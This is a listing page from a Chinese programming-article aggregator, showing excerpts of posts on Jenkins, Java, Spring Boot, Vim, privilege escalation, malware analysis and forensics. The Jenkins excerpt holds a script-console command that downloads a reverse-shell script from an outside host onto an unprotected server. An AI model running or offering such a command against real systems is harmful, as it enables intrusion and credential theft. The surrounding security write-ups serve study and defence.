标签:shell

Java

Jenkins凭证提取

1

xirruiqiang 发布于 2018-04-26

入口 碰到Jenkins未授权并且拥有Overall/RunScripts权限时可以在Script页面执行命令反弹Shell: println "wget http://www.rinige.com/back.py -P /tmp/".execute().te...

阅读(9)评论(0)赞 (0)

Java

OneinStack 1.7 发布,一键 PHP/JAVA 安装工具

wenming.gapo 发布于 2018-04-25

OneinStack 1.7 发布了,这个脚本是使用 shell编写,为了快速在生产环境上部署lnmp/lamp/lnmpa/lnmt(Linux、Nginx/Tengine/OpenResty、 MySQL/MariaDB/Percona/MongoDB/PostgreSQL ...

阅读(12)评论(0)赞 (0)

Spring

从零搭建自己的SpringBoot后台框架(九)

3

刘莉莉 发布于 2018-04-25

Hello大家好,本章我们集成generator自动生成model,xml,dao功能 。有问题可以联系我mr_beany@163.com。另求各路大神指点,感谢 ps:最近这几天在忙着搬家,更新的速度和回消息的速度可能不会特别及时,见谅 一:添加所需依赖 由于我们上篇文章讲过使...

阅读(15)评论(0)赞 (0)

编程技术

PentesterLab新手教程(一):代码注入

xubiao.zhuang 发布于 2018-04-24

*本文作者:婷儿小跟班,本文属 FreeBuf 原创奖励计划,未经许可禁止转载。 PentesterLab 简介 Web for pentester 是国外安全研究者开发的的一款渗透测试平台。 这个平台包含的主要漏洞如下: Code injection (代码注入) Comman...

阅读(11)评论(0)赞 (0)

IOS技术

iOS开发学习路线

likai 发布于 2018-04-23

前言 这里筑梦师,是一名正在努力学习的iOS开发工程师,目前致力于全栈方向的学习,希望可以和大家一起交流技术,共同进步,用简书记录下自己的学习历程. 个人学习方法分享[如何优雅的使用Mac进行开发]稍后更新 本文阅读建议 1.一定要辩证的看待本文. 2.本文主要是本人对iOS开发...

阅读(22)评论(0)赞 (0)

编程技术

如何在 macOS 上一键批量把 PPT 和 Word 文件转成 PDF

5

changyuan.xu 发布于 2018-04-23

相信不少人都有或曾经有过需要将多个 PPT/Word 文件转为 PDF 的需求,可能是一堆 PPT 课件为了方便批注,也可能是一些 Word 文档为了方便阅读。每次只能打开一个文档,选择「另存为」,选「PDF」,点「保存」,关掉,再打开下一个文档,文档数目一多,整个过程就会变得很...

阅读(12)评论(0)赞 (0)

编程技术

CVE-2017-16995 Ubuntu本地提权测试(任意地址读写利用)

5

xirruiqiang 发布于 2018-04-23

*本文原创作者:lxzh123,本文属FreeBuf原创奖励计划,未经许可禁止转载 漏洞描述 该漏洞存在于带有 eBPF bpf(2)系统(CONFIG_BPF_SYSCALL)编译支持的Linux内核中,是一个内存任意读写漏洞。该漏洞是由于eBPF验证模块的计算错误产生的。普通...

阅读(21)评论(0)赞 (0)

编程技术

VMware兼容性检查指北

xiaoli.wang 发布于 2018-04-23

本文记录了具体如何从VMware官方网站检查硬件(BIOS/RAID/NIC/HBA)等兼容性信息,提前确认VMware软硬件兼容性结果避免数据中心建设规划时候采坑回退。说一句不相关的想法,整个IT行业从VMware转投OpenStack的进程越来越快,而VMware面对的竞争者...

阅读(24)评论(0)赞 (0)

编程技术

使用 anacron 定期执行任务

yeseng 发布于 2018-04-22

anacron与cron的不同点 在网上可以可以看到很多文章都把anacron与cron来做比较,但实际上这两者之间的差距还是蛮大的。 cron任务同通过常驻的守护进程crond来定期执行的。 而anacron则不是守护进程,它需要被别人定期掉起,比如跟cron或systemd ...

阅读(31)评论(0)赞 (0)

编程技术

有赞 MySQL 自动化运维系统:ZanDB

8

zhuangli 发布于 2018-04-22

文 | 杨一 on 运维 一、前言 有赞作为”新零售”的软件服务供应商,随着业务的不断发展,从第一批几十家商户到现在300万商家,涉及零售,美业,餐饮,自媒体等众多商家,业务规模以及访问量爆发式增长。 一方面给后端数据库带来的影响是服务器数量和 DB 实例的数据量出现成倍增加。各...

阅读(30)评论(0)赞 (0)

编程技术

调用jscript引擎接口的malware分析

3

dulong 发布于 2018-04-22

int __cdecl main(int argc, const char argv, const char envp) { JSEngine v3 ; // ST20_4 JSEngine v4 ; // ST18_4 unsigned int i ; // [esp+1Ch]...

阅读(28)评论(0)赞 (0)

编程技术

Vim 8 下 C/C++ 开发环境搭建

1

xubiao.zhuang 发布于 2018-04-22

2018 年了,网上很多 Vim 下开发 C/C++ 的文章都太过老旧,且不成体系。目前各大 Linux 发行版和 Mac OS X自带的 Vim 都已经跟进到 8了,少数老旧系统也可以下载最新代码重新编译一下。那如何高效的再 Vim 8 中开发 C/C++ 项目呢? 假设你已经...

阅读(32)评论(0)赞 (0)

编程技术

Java 10:来看 var 的新玩法

2

xiaoli.he 发布于 2018-04-21

作为每六个月新的发布周期,Oracle重新定义了Java的版本策略,并在3月20日推出了Java 10。 此版本引入同JEPS(JDK增强建议)定义的12个增强功能。其中之一是局部变量类型推断(JEP 286)。 在这一版本中,引入了var关键字,它可以允许编译器使用其初始值设定...

阅读(22)评论(0)赞 (0)

编程技术

Codiad在线IDE框架漏洞挖掘

20

darida 发布于 2018-04-20

简介 : Codiad 是一个开源基于Web的IDE应用程序,用于在线编写和编辑代码。 仓库 : https://github.com/Codiad/Codiad 环境搭建 : 通过phpstudy搭建基础,并开启Xdebug 。 可参考 https://blog.csdn.ne...

阅读(27)评论(0)赞 (0)

编程技术

Spark2.1.0之剖析spark-shell

4

邓龙华 发布于 2018-04-20

通过在spark-shell中执行word count的过程,让读者了解到可以使用spark-shell提交Spark作业。现在读者应该很想知道spark-shell究竟做了什么呢? 脚本分析 在Spark安装目录的bin文件夹下可以找到spark-shell,其中有代码清单1-...

阅读(26)评论(0)赞 (0)

编程技术

x86环境病毒分析的反汇编基础知识

10

dulong 发布于 2018-04-20

本文是一篇对x86环境下进行病毒分析所需的基础反汇编知识的简单总结,更深层的知识还需要实战经验。 x86体系结构 大部分现代计算机体系结构(包括x86)在内部实现上遵循冯·诺依曼结构。这种结构包含3种硬件组件:  • 中央处理单元( CPU ),负责执行代...

阅读(31)评论(0)赞 (0)

编程技术

全栈虚拟机 GraalVM 初体验

18

changyuan.xu 发布于 2018-04-19

官方介绍 近日Oracle开源了一个实验性的产品GraalVM,官方称之为Universal GraalVM。它打通了不同语言之间的鸿沟,让我们可以进行混合式多语言编程。 在GraalVM之上,我们可以编写Java、Python、Ruby、R、Scala、Kotlin,甚至是C、...

阅读(43)评论(0)赞 (0)

编程技术

内存取证:查找Metasploit的Meterpreter踪迹

13

刘莉莉 发布于 2018-04-19

Metasploit是一个非常受欢迎的渗透测试框架,被视为安全测试人员手中的一把利器。但在另一方面由于他过于强大,因此也常常被一些恶意攻击者所利用。当然,在本文我们主要讨论的是关于内存取证,这对于我们来说是至关重要的。因为我们(受害者)的机器极有可能会被恶意攻击者,注入Meter...

阅读(48)评论(0)赞 (0)